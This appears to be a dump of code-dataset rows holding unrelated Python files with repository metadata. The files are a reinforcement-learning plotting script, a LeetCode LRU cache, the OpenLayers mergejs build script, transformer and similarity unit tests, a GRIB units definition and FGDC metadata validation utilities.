ax2.set_title("Average episode return")
ax2.legend()
plt.show()
def plot_softmax(map):
lr1 = 0.1
d1 = 0.99
steps1, avg_lengths1, avg_returns1 = sarsa_softmax(map_file=map, learning_rate=lr1,
discount=d1, train_episodes=500, q0=0,
final_show=False)
lr2 = 0.2
d2 = 0.99
steps2, avg_lengths2, avg_returns2 = sarsa_softmax(map_file=map, learning_rate=lr2,
discount=d2, train_episodes=500, q0=0,
final_show=False)
lr3 = 0.4
d3 = 0.99
steps3, avg_lengths3, avg_returns3 = sarsa_softmax(map_file=map, learning_rate=lr3,
discount=d3, train_episodes=500, q0=0,
final_show=False)
lr4 = 0.8
d4 = 0.99
steps4, avg_lengths4, avg_returns4 = sarsa_softmax(map_file=map, learning_rate=lr4,
discount=d4, train_episodes=500, q0=0,
final_show=False)
_fig, (ax1, ax2) = plt.subplots(ncols=2)
ax1.plot(steps1, avg_lengths1, label="softmax lr=" + str(lr1))
ax1.plot(steps2, avg_lengths2, label="softmax lr=" + str(lr2))
ax1.plot(steps3, avg_lengths3, label="softmax lr=" + str(lr3))
ax1.plot(steps4, avg_lengths4, label="softmax lr=" + str(lr4))
ax1.set_title("Average episode length")
ax1.legend()
ax2.plot(steps1, avg_returns1, label="softmax lr=" + str(lr1))
ax2.plot(steps2, avg_returns2, label="softmax lr=" + str(lr2))
ax2.plot(steps3, avg_returns3, label="softmax lr=" + str(lr3))
ax2.plot(steps4, avg_returns4, label="softmax lr=" + str(lr4))
ax2.set_title("Average episode return")
ax2.legend()
plt.show()
if __name__ == '__main__':
plot_softmax("MiniGrid-Empty-6x6-v0")
| 4,162
| 0
| 46
|
47b9a30e8798f592988d1d728ccd51bd10f6cb58
| 958
|
py
|
Python
|
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
#
# @lc app=leetcode id=146 lang=python3
#
# [146] LRU Cache
#
# @lc code=start
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
# @lc code=end
| 22.809524
| 63
| 0.538622
|
#
# @lc app=leetcode id=146 lang=python3
#
# [146] LRU Cache
#
# @lc code=start
class LRUCache:
def __init__(self, capacity: int):
self.cap = capacity
self.d = dict()
self.stack = []
def get(self, key: int):
if key not in self.d:
return -1
self.stack.remove(key)
self.stack.append(key)
return self.d[key]
def put(self, key: int, value: int):
if key in self.d:
self.d[key] = value
self.stack.remove(key)
self.stack.append(key)
else:
if len(self.stack) >= self.cap:
to_delete = self.stack[0]
self.stack = self.stack[1:]
del self.d[to_delete]
self.d[key] = value
self.stack.append(key)
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
# @lc code=end
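A short demonstration of the cache above (kept outside the LeetCode submission region): with capacity 2, key 2 is evicted once key 1 has been touched more recently.
if __name__ == "__main__":
    cache = LRUCache(2)
    cache.put(1, 1)
    cache.put(2, 2)
    print(cache.get(1))   # 1   (key 1 becomes most recently used)
    cache.put(3, 3)       # evicts key 2, the least recently used entry
    print(cache.get(2))   # -1
    print(cache.get(3))   # 3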
| 625
| -6
| 103
|
019902fd823def4e117ea65ffc273ad7678112be
| 7,817
|
py
|
Python
|
mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | 1
|
2015-07-17T19:01:07.000Z
|
2015-07-17T19:01:07.000Z
|
mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | null | null | null |
mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2008 MetaCarta, Inc. / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re, os, sys
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = "@requires:? (.*)\n" # TODO: Ensure in comment?
class SourceFile:
"""
Represents a Javascript source code file.
"""
def __init__(self, filepath, source):
"""
"""
self.filepath = filepath
self.source = source
self.requiredBy = []
def _getRequirements(self):
"""
Extracts the dependencies specified in the source code and returns
a list of them.
"""
# TODO: Cache?
return re.findall(RE_REQUIRE, self.source)
requires = property(fget=_getRequirements, doc="")
class Config:
"""
Represents a parsed configuration file.
A configuration file should be of the following form:
[first]
3rd/prototype.js
core/application.js
core/params.js
# A comment
[last]
core/api.js # Another comment
[exclude]
3rd/logger.js
All headings are required.
The files listed in the `first` section will be forced to load
*before* all other files (in the order listed). The files in `last`
section will be forced to load *after* all the other files (in the
order listed).
The files list in the `exclude` section will not be imported.
Any text appearing after a # symbol indicates a comment.
"""
def read(self, filename):
"""
Parses the content of the named file and stores the values.
:param filename: the path to a configuration file
:return none
"""
lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
for line in open(filename)
if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
self.exclude = lines[lines.index("[exclude]") + 1:]
def scanjs(sourceDirectory, config = None):
""" scans scanDirectory recursively and returns a list of paths to javascript files
:param sourceDirectory: the directory root
:return list object of all file paths
"""
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if config and config.include:
if filepath in config.include or filepath in config.forceFirst:
allFiles.append(filepath)
elif (not config) or (filepath not in config.exclude):
allFiles.append(filepath)
return allFiles
def merge (sourceDirectory, config = None):
""" Merges source files within a given directory according to a configuration
:param sourceDirectory: a string designating the path of the OpenLayers source
:param config: a mergejs.Config object
"""
from toposort import toposort
allFiles = scanjs(sourceDirectory, config)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = {}
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
complete = False
resolution_pass = 1
while not complete:
order = [] # List of filepaths to output, in a dependency satisfying order
nodes = []
routes = []
## Resolve the dependencies
resolution_pass += 1
for filepath, info in files.items():
nodes.append(filepath)
for neededFilePath in info.requires:
routes.append((neededFilePath, filepath))
for dependencyLevel in toposort(nodes, routes):
for filepath in dependencyLevel:
order.append(filepath)
if not files.has_key(filepath):
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
# Double check all dependencies have been met
complete = True
try:
for fp in order:
if max([order.index(rfp) for rfp in files[fp].requires] +
[order.index(fp)]) != order.index(fp):
complete = False
except:
complete = False
## Move forced first and last files to the required position
if config:
order = config.forceFirst + [item
for item in order
if ((item not in config.forceFirst) and
(item not in config.forceLast))] + config.forceLast
## Output the files in the determined order
result = []
for fp in order:
f = files[fp]
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
return "".join(result)
if __name__ == "__main__":
from optparse import OptionParser
usage = "usage: mergejs.py <output.js> <source directory> [--config config filename]"
parser = OptionParser(usage=usage)
parser.add_option('-c', '--config', dest="config_filename", action="store",
help="Config file name")
(options, args) = parser.parse_args()
try:
        outputFilename = args[0]
        sourceDirectory = args[1]
except IndexError:
parser.print_help()
sys.exit()
if options.config_filename:
config = Config()
config.read(options.config_filename)
else:
config = None
output = merge(sourceDirectory, config)
file(outputFilename, "w").write(output)
| 32.707113
| 102
| 0.612639
|
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2008 MetaCarta, Inc. / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re, os, sys
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = "@requires:? (.*)\n" # TODO: Ensure in comment?
class SourceFile:
"""
Represents a Javascript source code file.
"""
def __init__(self, filepath, source):
"""
"""
self.filepath = filepath
self.source = source
self.requiredBy = []
def _getRequirements(self):
"""
Extracts the dependencies specified in the source code and returns
a list of them.
"""
# TODO: Cache?
return re.findall(RE_REQUIRE, self.source)
requires = property(fget=_getRequirements, doc="")
class Config:
"""
Represents a parsed configuration file.
A configuration file should be of the following form:
[first]
3rd/prototype.js
core/application.js
core/params.js
# A comment
[last]
core/api.js # Another comment
[exclude]
3rd/logger.js
All headings are required.
The files listed in the `first` section will be forced to load
*before* all other files (in the order listed). The files in `last`
section will be forced to load *after* all the other files (in the
order listed).
The files list in the `exclude` section will not be imported.
Any text appearing after a # symbol indicates a comment.
"""
def __init__(self, **kwargs):
self.forceFirst = kwargs.get('forceFirst', [])
self.forceLast = kwargs.get('forceLast', [])
self.include = kwargs.get('include', [])
self.exclude = kwargs.get('exclude', [])
def read(self, filename):
"""
Parses the content of the named file and stores the values.
:param filename: the path to a configuration file
:return none
"""
lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
for line in open(filename)
if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
self.exclude = lines[lines.index("[exclude]") + 1:]
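# Hypothetical usage sketch for Config (the file name "full.cfg" is an
# assumption, not part of this script):
#
#   cfg = Config()
#   cfg.read("full.cfg")
#   # cfg.forceFirst, cfg.forceLast, cfg.include and cfg.exclude now hold the
#   # file lists parsed from the sections described in the class docstring.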
def scanjs(sourceDirectory, config = None):
""" scans scanDirectory recursively and returns a list of paths to javascript files
:param sourceDirectory: the directory root
:return list object of all file paths
"""
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if config and config.include:
if filepath in config.include or filepath in config.forceFirst:
allFiles.append(filepath)
elif (not config) or (filepath not in config.exclude):
allFiles.append(filepath)
return allFiles
def merge (sourceDirectory, config = None):
""" Merges source files within a given directory according to a configuration
:param sourceDirectory: a string designating the path of the OpenLayers source
:param config: a mergejs.Config object
"""
from toposort import toposort
allFiles = scanjs(sourceDirectory, config)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = {}
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
complete = False
resolution_pass = 1
while not complete:
order = [] # List of filepaths to output, in a dependency satisfying order
nodes = []
routes = []
## Resolve the dependencies
resolution_pass += 1
for filepath, info in files.items():
nodes.append(filepath)
for neededFilePath in info.requires:
routes.append((neededFilePath, filepath))
for dependencyLevel in toposort(nodes, routes):
for filepath in dependencyLevel:
order.append(filepath)
if not files.has_key(filepath):
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
# Double check all dependencies have been met
complete = True
try:
for fp in order:
if max([order.index(rfp) for rfp in files[fp].requires] +
[order.index(fp)]) != order.index(fp):
complete = False
except:
complete = False
## Move forced first and last files to the required position
if config:
order = config.forceFirst + [item
for item in order
if ((item not in config.forceFirst) and
(item not in config.forceLast))] + config.forceLast
## Output the files in the determined order
result = []
for fp in order:
f = files[fp]
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
return "".join(result)
if __name__ == "__main__":
from optparse import OptionParser
usage = "usage: mergejs.py <output.js> <source directory> [--config config filename]"
parser = OptionParser(usage=usage)
parser.add_option('-c', '--config', dest="config_filename", action="store",
help="Config file name")
(options, args) = parser.parse_args()
try:
        outputFilename = args[0]
        sourceDirectory = args[1]
except IndexError:
parser.print_help()
sys.exit()
if options.config_filename:
config = Config()
config.read(options.config_filename)
else:
config = None
output = merge(sourceDirectory, config)
file(outputFilename, "w").write(output)
| 214
| 0
| 31
|
37506a8286c5b05402cb22c60eb6b8354ead4f28
| 5,955
|
py
|
Python
|
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | null | null | null |
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | null | null | null |
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | 1
|
2022-03-18T09:26:05.000Z
|
2022-03-18T09:26:05.000Z
|
"""The test file for transformer DNN"""
import ehrudite.core.dnn.transformer as transformer
import random
import tensorflow as tf
| 34.224138
| 87
| 0.674559
|
"""The test file for transformer DNN"""
import ehrudite.core.dnn.transformer as transformer
import random
import tensorflow as tf
def test_transformer_encoder_decoder_layer():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
target_seq_len = random.randint(10, 30)
num_heads = 2 ** random.randint(1, 4)
encoder_layer = transformer.EncoderLayer(d_model, num_heads, dff)
encoder_layer_output = encoder_layer(
tf.random.uniform((batch_size, input_seq_len, d_model)), False, None
)
assert (batch_size, input_seq_len, d_model) == encoder_layer_output.shape
decoder_layer = transformer.DecoderLayer(d_model, num_heads, dff)
decoder_layer_output, _, _ = decoder_layer(
tf.random.uniform((batch_size, target_seq_len, d_model)),
encoder_layer_output,
False,
None,
None,
)
assert (batch_size, target_seq_len, d_model) == decoder_layer_output.shape
def test_transformer_encoder_decoder():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
input_vocab_size = random.randint(1000, 10000)
maximum_position_encoding = random.randint(1024, 4096)
num_heads = 2 ** random.randint(1, 4)
num_layers = random.randint(2, 4)
target_seq_len = random.randint(10, 30)
target_vocab_size = random.randint(1000, 10000)
encoder = transformer.Encoder(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
input_vocab_size=input_vocab_size,
maximum_position_encoding=maximum_position_encoding,
)
temp_input = tf.random.uniform(
(batch_size, input_seq_len), dtype=tf.int64, minval=0, maxval=200
)
encoder_output = encoder(temp_input, training=False, mask=None)
assert encoder_output.shape == (batch_size, input_seq_len, d_model)
decoder = transformer.Decoder(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
target_vocab_size=target_vocab_size,
maximum_position_encoding=maximum_position_encoding,
)
temp_input = tf.random.uniform(
(batch_size, target_seq_len), dtype=tf.int64, minval=0, maxval=200
)
output, attn = decoder(
temp_input,
enc_output=encoder_output,
training=False,
look_ahead_mask=None,
padding_mask=None,
)
assert output.shape == (batch_size, target_seq_len, d_model)
assert len(attn.keys()) == 2
def test_transformer_positional_encoding():
maximum_position_encoding = random.randint(1024, 4096)
d_model = 2 ** random.randint(7, 9)
pos_encoding = transformer._positional_encoding(maximum_position_encoding, d_model)
assert pos_encoding.shape == (1, maximum_position_encoding, d_model)
def test_transformer_scaled_dot_product_attention():
    # K and V must have the same number of rows (seq_len_k == seq_len_v)
    # Q and K must have the same depth, i.e. their last dimension must match
temp_k = tf.constant(
[[10, 0, 0], [0, 10, 0], [0, 0, 10], [0, 0, 10]], dtype=tf.float32
) # (4, 3)
temp_v = tf.constant(
[[1, 0], [10, 0], [100, 5], [1000, 6]], dtype=tf.float32
) # (4, 2)
# This `query` aligns with the second `key`,
# so the second `value` is returned.
temp_q = tf.constant([[0, 10, 0]], dtype=tf.float32) # (1, 3)
temp_out, temp_attn = transformer.scaled_dot_product_attention(
temp_q, temp_k, temp_v, None
)
assert temp_attn.shape == (temp_q.shape[0], temp_v.shape[0])
assert temp_out.shape == (temp_q.shape[0], temp_v.shape[1])
temp_q = tf.constant(
[[0, 0, 10], [0, 10, 0], [10, 10, 0]], dtype=tf.float32
) # (3, 3)
temp_out, temp_attn = transformer.scaled_dot_product_attention(
temp_q, temp_k, temp_v, None
)
assert temp_attn.shape == (temp_q.shape[0], temp_v.shape[0])
assert temp_out.shape == (temp_q.shape[0], temp_v.shape[1])
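# Worked check for the scaled dot-product test above: with temp_q = [0, 10, 0]
# the raw scores q.k / sqrt(3) are roughly [0, 57.7, 0, 0], softmax turns that
# into weights of approximately [0, 1, 0, 0], and the weighted sum of the value
# rows is therefore ~[10, 0] -- the second value, as the alignment comment says.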
def test_multi_head_attention():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
encoder_sequence = random.randint(50, 100)
num_heads = 2 ** random.randint(1, 4)
temp_mha = transformer.MultiHeadAttention(d_model=d_model, num_heads=num_heads)
y = tf.random.uniform(
(batch_size, encoder_sequence, d_model)
) # (batch_size, encoder_sequence, d_model)
out, attn = temp_mha(y, k=y, q=y, mask=None)
assert out.shape == y.shape
assert attn.shape == (y.shape[0], num_heads, y.shape[1], y.shape[1])
def test_transformer_model():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
input_vocab_size = random.randint(1000, 10000)
num_heads = 2 ** random.randint(1, 4)
num_layers = random.randint(2, 4)
target_seq_len = random.randint(10, 30)
target_vocab_size = random.randint(1000, 10000)
sample_transformer = transformer.Transformer(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
input_vocab_size=input_vocab_size,
target_vocab_size=target_vocab_size,
pe_input=random.randint(5000, 10000),
pe_target=random.randint(2000, 4000),
)
temp_input = tf.random.uniform(
(batch_size, input_seq_len), dtype=tf.int64, minval=0, maxval=200
)
temp_target = tf.random.uniform(
(batch_size, target_seq_len), dtype=tf.int64, minval=0, maxval=200
)
fn_out, _ = sample_transformer([temp_input, temp_target], training=False)
assert fn_out.shape == (batch_size, target_seq_len, target_vocab_size)
def test_optimizer():
d_model = 2 ** random.randint(7, 9)
optimizer = transformer.optimizer(d_model)
assert optimizer is not None
| 5,656
| 0
| 161
|
e2ec933ae2e853f380dc429a8199678745d149a0
| 454
|
py
|
Python
|
tests/core/test_asset.py
|
BlockGeeks0x01/py-asimov
|
5490b90bd5f47d48a69aa4de3b13c60039b2603f
|
[
"MIT"
] | null | null | null |
tests/core/test_asset.py
|
BlockGeeks0x01/py-asimov
|
5490b90bd5f47d48a69aa4de3b13c60039b2603f
|
[
"MIT"
] | null | null | null |
tests/core/test_asset.py
|
BlockGeeks0x01/py-asimov
|
5490b90bd5f47d48a69aa4de3b13c60039b2603f
|
[
"MIT"
] | null | null | null |
from unittest.mock import Mock
from asimov import Asset, constant
| 28.375
| 68
| 0.742291
|
from unittest.mock import Mock
from asimov import Asset, constant
def test_asset():
assert Asset.asset_wrapper(0, 1, 1) == 4294967297
assert Asset.asset2str(4294967297) == '000000000000000100000001'
mock_contract = Mock()
mock_contract.read.return_value = 1
new_asset = Asset(mock_contract, 0, 1)
print(new_asset)
assert new_asset.asset_id_int == 4294967297
assert new_asset.asset_id_str == '000000000000000100000001'
| 363
| 0
| 23
|
6052fd4f4ec0f135719d466deae94ed26256b6cc
| 2,471
|
py
|
Python
|
datamatch/test_similarities.py
|
pckhoi/datamatch
|
3d279293ff9bec84f383133090863db1307a3a68
|
[
"MIT"
] | 2
|
2021-05-22T01:53:20.000Z
|
2021-05-25T01:15:35.000Z
|
datamatch/test_similarities.py
|
pckhoi/datamatch
|
3d279293ff9bec84f383133090863db1307a3a68
|
[
"MIT"
] | 3
|
2021-05-10T03:27:51.000Z
|
2021-06-10T09:50:07.000Z
|
datamatch/test_similarities.py
|
pckhoi/datamatch
|
3d279293ff9bec84f383133090863db1307a3a68
|
[
"MIT"
] | null | null | null |
import unittest
from datetime import date
from datamatch.similarities import (
StringSimilarity, DateSimilarity, JaroWinklerSimilarity, AbsoluteNumericalSimilarity, RelativeNumericalSimilarity
)
| 39.222222
| 117
| 0.645488
|
import unittest
from datetime import date
from datamatch.similarities import (
StringSimilarity, DateSimilarity, JaroWinklerSimilarity, AbsoluteNumericalSimilarity, RelativeNumericalSimilarity
)
class TestStringSimilarity(unittest.TestCase):
def test_sim(self):
obj = StringSimilarity()
self.assertEqual(obj.sim("abc", "abc"), 1)
self.assertEqual(obj.sim("abc", "123"), 0)
self.assertEqual(obj.sim("abce", "abcd"), 0.75)
self.assertEqual(obj.sim("thang", "thăng"), 1)
class TestJaroWinklerSimilarity(unittest.TestCase):
def test_sim(self):
obj = JaroWinklerSimilarity(0.2)
self.assertEqual(obj.sim("abc", "abc"), 1)
self.assertEqual(obj.sim("abc", "123"), 0)
self.assertEqual(obj.sim("abce", "abcd"), 0.9333333333333333)
self.assertEqual(obj.sim("wbcd", "abcd"), 0.8333333333333334)
class TestDateSimilarity(unittest.TestCase):
def test_sim(self):
obj = DateSimilarity()
self.assertEqual(obj.sim(date(2000, 10, 11), date(2000, 10, 11)), 1)
# within 30 days difference
self.assertEqual(obj.sim(date(2000, 10, 11), date(2000, 10, 5)), 0.8)
self.assertEqual(
obj.sim(date(2000, 10, 11), date(2000, 11, 5)), 0.16666666666666663)
# completely different days
self.assertEqual(obj.sim(date(2000, 10, 11), date(2001, 3, 15)), 0)
# day & month is swapped
self.assertEqual(obj.sim(date(2000, 9, 11), date(2000, 11, 9)), 0.5)
# same year and day but month is different
self.assertEqual(obj.sim(date(2000, 3, 20), date(2000, 8, 20)), 0.875)
class TestAbsoluteNumericalSimilarity(unittest.TestCase):
def test_sim(self):
obj = AbsoluteNumericalSimilarity(10)
self.assertEqual(obj.sim(10, 10), 1)
self.assertEqual(obj.sim(8.9, 8.9), 1)
self.assertEqual(obj.sim(10, 5), 0.5)
self.assertEqual(obj.sim(10, 15), 0.5)
self.assertEqual(obj.sim(8.2, 3.1), 0.49)
self.assertEqual(obj.sim(40, 10), 0)
class TestRelativeNumericalSimilarity(unittest.TestCase):
def test_sim(self):
obj = RelativeNumericalSimilarity(30)
self.assertEqual(obj.sim(10000, 10000), 1)
self.assertEqual(obj.sim(8.9, 8.9), 1)
self.assertEqual(obj.sim(10000, 8500), 0.5)
self.assertEqual(obj.sim(8500, 10000), 0.5)
self.assertEqual(obj.sim(8.2, 3.1), 0)
self.assertEqual(obj.sim(10000, 7000), 0)
| 1,872
| 150
| 245
|
4942b83f028a5746713b6d146dd0b18ef104db83
| 575
|
py
|
Python
|
pyeccodes/defs/grib1/localConcepts/ekmi/units_def.py
|
ecmwf/pyeccodes
|
dce2c72d3adcc0cb801731366be53327ce13a00b
|
[
"Apache-2.0"
] | 7
|
2020-04-14T09:41:17.000Z
|
2021-08-06T09:38:19.000Z
|
pyeccodes/defs/grib1/localConcepts/ekmi/units_def.py
|
ecmwf/pyeccodes
|
dce2c72d3adcc0cb801731366be53327ce13a00b
|
[
"Apache-2.0"
] | null | null | null |
pyeccodes/defs/grib1/localConcepts/ekmi/units_def.py
|
ecmwf/pyeccodes
|
dce2c72d3adcc0cb801731366be53327ce13a00b
|
[
"Apache-2.0"
] | 3
|
2020-04-30T12:44:48.000Z
|
2020-12-15T08:40:26.000Z
|
import pyeccodes.accessors as _
| 23.958333
| 62
| 0.596522
|
import pyeccodes.accessors as _
def load(h):
def wrapped(h):
table2Version = h.get_l('table2Version')
indicatorOfParameter = h.get_l('indicatorOfParameter')
if table2Version == 1 and indicatorOfParameter == 224:
return 'J kg**-1'
if table2Version == 1 and indicatorOfParameter == 225:
return 'J kg**-1'
if table2Version == 1 and indicatorOfParameter == 228:
return 'm s**-1'
if table2Version == 1 and indicatorOfParameter == 61:
return 'kg m**-2'
return wrapped
| 519
| 0
| 23
|
8e54067c74c3efbad693b3983718ac2e603e8a34
| 9,858
|
py
|
Python
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 53
|
2017-05-01T05:03:33.000Z
|
2022-03-13T04:49:15.000Z
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 109
|
2017-05-17T15:15:40.000Z
|
2022-03-24T21:12:45.000Z
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 17
|
2017-02-08T16:18:18.000Z
|
2021-01-28T19:38:09.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
"""
The MetadataWizard(pymdwizard) software was developed by the
U.S. Geological Survey Fort Collins Science Center.
See: https://github.com/usgs/fort-pymdwizard for current project source code
See: https://usgs.github.io/fort-pymdwizard/ for current user documentation
See: https://github.com/usgs/fort-pymdwizard/tree/master/examples
for examples of use in other scripts
License: Creative Commons Attribution 4.0 International (CC BY 4.0)
http://creativecommons.org/licenses/by/4.0/
PURPOSE
------------------------------------------------------------------------------
Module contains utility functions for interacting with XML FGDC records
SCRIPT DEPENDENCIES
------------------------------------------------------------------------------
This script is part of the pymdwizard package and is not intended to be
used independently. All pymdwizard package requirements are needed.
See imports section for external packages used in this script as well as
inter-package dependencies
U.S. GEOLOGICAL SURVEY DISCLAIMER
------------------------------------------------------------------------------
This software has been approved for release by the U.S. Geological Survey
(USGS). Although the software has been subjected to rigorous review,
the USGS reserves the right to update the software as needed pursuant to
further analysis and review. No warranty, expressed or implied, is made by
the USGS or the U.S. Government as to the functionality of the software and
related material nor shall the fact of release constitute any such warranty.
Furthermore, the software is released on condition that neither the USGS nor
the U.S. Government shall be held liable for any damages resulting from
its authorized or unauthorized use.
Any use of trade, product or firm names is for descriptive purposes only and
does not imply endorsement by the U.S. Geological Survey.
Although this information product, for the most part, is in the public domain,
it also contains copyrighted material as noted in the text. Permission to
reproduce copyrighted items for other than personal use must be secured from
the copyright owner.
------------------------------------------------------------------------------
"""
import json
from dateutil import parser
import defusedxml.lxml as lxml
import pandas as pd
from pymdwizard.core import xml_utils
from pymdwizard.core import utils
from collections import OrderedDict
FGDC_XSD_NAME = "FGDC/fgdc-std-001-1998-annotated.xsd"
BDP_XSD_NAME = "FGDC/BDPfgdc-std-001-1998-annotated.xsd"
def validate_xml(xml, xsl_fname="fgdc", as_dataframe=False):
"""
Parameters
----------
xml : lxml document
or
filename
or
string containing xml representation
xsl_fname : str (optional)
can be one of:
'fgdc' - uses the standard fgdc schema
../resources/FGDC/fgdc-std-001-1998-annotated.xsd
'bdp' = use the Biological Data profile schema,
../resources/FGDC/BDPfgdc-std-001-1998-annotated.xsd
full file path to another local schema.
if not specified defaults to 'fgdc'
as_dataframe : bool
used to specify return format (list of tuples or dataframe)
Returns
-------
list of tuples
(xpath, error message, line number)
or
pandas dataframe
"""
if xsl_fname.lower() == "fgdc":
xsl_fname = utils.get_resource_path(FGDC_XSD_NAME)
elif xsl_fname.lower() == "bdp":
xsl_fname = utils.get_resource_path(BDP_XSD_NAME)
else:
xsl_fname = xsl_fname
xmlschema = xml_utils.load_schema(xsl_fname)
xml_doc = xml_utils.xml_document_loader(xml)
xml_str = xml_utils.node_to_string(xml_doc)
